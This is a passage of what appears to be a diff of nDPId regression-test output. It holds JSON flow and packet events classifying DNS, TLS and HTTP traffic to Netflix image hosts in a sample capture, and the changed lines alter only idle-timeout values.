00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1484319036827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1484319036827,"pkt":"gCqoTGHM5JjWH70UCABFAABHX6YAAP8R2KbAqAEHwKgBAeF3ADUAM2aFMVgBAAABAAAAAAAABHNoYTIDc2FuBGFrYW0HbmZseGltZwNuZXQAAAEAAQ=="} 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1484319036847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1484319036847,"pkt":"5JjWH70UgCqoTGHMCABFAAB74URAAEAR1dTAqAEBwKgBBwA14XcAZ3RRMViBgAABAAIAAAAABHNoYTIDc2FuBGFrYW0HbmZseGltZwNuZXQAAAEAAcAMAAUAAQAAACAAGAVlMzA2NwRkc2NnCmFrYW1haWVkZ2XAIsA3AAEAAQAAABIABGhWYbM="} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319036847,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.86.97.179"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036854,"flow_last_seen":1484319036854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319036854,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1484319036854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319036854,"pkt":"gCqoTGHM5JjWH70UCABFAABAqeJAAEAGBR3AqAEHaFZhs8+VAbsXO1WDAAAAALAC\/\/+GqQAAAgQFtAEDAwUBAQgKH2THJwAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1484319036865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319036865,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwGsuNoVmGzwKgBBwG7z5WR\/xaXFztVhKAScSAP4QAAAgQFtAQCCAoCM2vSH2THJwEDAwU="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1484319036868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319036868,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UCJAAEAGXunAqAEHaFZhs8+VAbsXO1WEkf8WmIAQEBWfqAAAAQEICh9kxzUCM2vS"} 
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319036854,"flow_last_seen":1484319036870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1484319036870,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319036854,"flow_last_seen":1484319036889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319036889,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":333,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1484319036854,"flow_last_seen":1484319036900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3641,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":1484319036900,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","server_names":"secure.cdn.nflximg.net,*.nflxext.com,*.nflxvideo.net,*.nflxsearch.net,*.nrd.nflximg.net,*.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=Los Gatos, O=Netflix, Inc., OU=Content Delivery Operations, CN=secure.cdn.nflximg.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"0D:EF:D1:E6:29:11:1A:A5:88:B3:2F:04:65:D6:D7:AD:84:A2:52:26"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036854,"flow_last_seen":1484319036854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319036854,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1484319036854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319036854,"pkt":"gCqoTGHM5JjWH70UCABFAABAqeJAAEAGBR3AqAEHaFZhs8+VAbsXO1WDAAAAALAC\/\/+GqQAAAgQFtAEDAwUBAQgKH2THJwAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1484319036865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319036865,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwGsuNoVmGzwKgBBwG7z5WR\/xaXFztVhKAScSAP4QAAAgQFtAQCCAoCM2vSH2THJwEDAwU="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1484319036868,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319036868,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UCJAAEAGXunAqAEHaFZhs8+VAbsXO1WEkf8WmIAQEBWfqAAAAQEICh9kxzUCM2vS"} 
+00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319036854,"flow_last_seen":1484319036870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1484319036870,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319036854,"flow_last_seen":1484319036889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319036889,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":333,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1484319036854,"flow_last_seen":1484319036900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3641,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":1484319036900,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","server_names":"secure.cdn.nflximg.net,*.nflxext.com,*.nflxvideo.net,*.nflxsearch.net,*.nrd.nflximg.net,*.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=Los Gatos, O=Netflix, Inc., OU=Content Delivery Operations, CN=secure.cdn.nflximg.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"0D:EF:D1:E6:29:11:1A:A5:88:B3:2F:04:65:D6:D7:AD:84:A2:52:26"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1484319042988,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1484319042988,"pkt":"gCqoTGHM5JjWH70UCABFAABGkh4AAP8Rpi\/AqAEHwKgBAecsADUAMtLh8roBAAABAAAAAAAAB2FydHdvcmsEYWthbQduZmx4aW1nA25ldAAAAQAB"} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1484319043002,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1484319043002,"pkt":"5JjWH70UgCqoTGHMCABFAACG4UVAAEAR1cjAqAEBwKgBBwA15ywAct6B8rqBgAABAAMAAAAAB2FydHdvcmsEYWthbQduZmx4aW1nA25ldAAAAQABwAwABQABAAAAUwAUBWExOTA3BGRzY2cGYWthbWFpwCHANgABAAEAAAAHAAS4GcwZwDYAAQABAAAABwAEuBnMCg=="} 
00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319043002,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.25"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043012,"flow_last_seen":1484319043012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043012,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1484319043012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043012,"pkt":"gCqoTGHM5JjWH70UCABFAABA10xAAEAGHYnAqAEHuBnMGc+cAFC2IFmCAAAAALAC\/\/8TjwAAAgQFtAEDAwUBAQgKH2TelwAAAAAEAgAA"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043013,"flow_last_seen":1484319043013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043013,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1484319043013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043013,"pkt":"gCqoTGHM5JjWH70UCABFAABAkrpAAEAGYhvAqAEHuBnMGc+dAFDU44WRAAAAALAC\/\/\/IugAAAgQFtAEDAwUBAQgKH2TemAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz5xwDCo3tiBZg6AScSDeBAAAAgQFtAQCCAr\/\/DsdH2TelwEDAwU="} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz53Qk2dE1OOFkqAScSD1lgAAAgQFtAQCCAr\/\/DsiH2TemAEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1484319043041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043041,"pkt":"gCqoTGHM5JjWH70UCABFAAA0zhNAAEAGJs7AqAEHuBnMGc+cAFC2IFmDcAwqOIAQEBVtuwAAAQEICh9k3rb\/\/Dsd"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1484319043042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043042,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UPZAAEAGo+vAqAEHuBnMGc+dAFDU44WS0JNnRYAQEBWFTgAAAQEICh9k3rb\/\/Dsi"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043012,"flow_last_seen":1484319043068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043068,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/af7a5\/362643424e775d0393ddb46e145c2375367af7a5.webp","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043013,"flow_last_seen":1484319043078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043078,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/5758c\/bb636e44b87ef854c331ed7b7b6e157e4945758c.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043665,"flow_last_seen":1484319043665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1484319043665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043665,"pkt":"gCqoTGHM5JjWH70UCABFAABAaV9AAEAGi3bAqAEHuBnMGc+eAFByPGEHAAAAALAC\/\/9NegAAAgQFtAEDAwUBAQgKH2ThCQAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1484319043688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319043688,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz57u7DQucjxhCKAScSCMigAAAgQFtAQCCAr\/\/D2rH2ThCQEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1484319043689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319043689,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VAZAAEAGoNvAqAEHuBnMGc+eAFByPGEI7uw0L4AQEBUcSAAAAQEICh9k4SH\/\/D2r"} 
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043665,"flow_last_seen":1484319043691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319043691,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/87b33\/bed1223a0040fdc97bac4e906332e462c6e87b33.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; 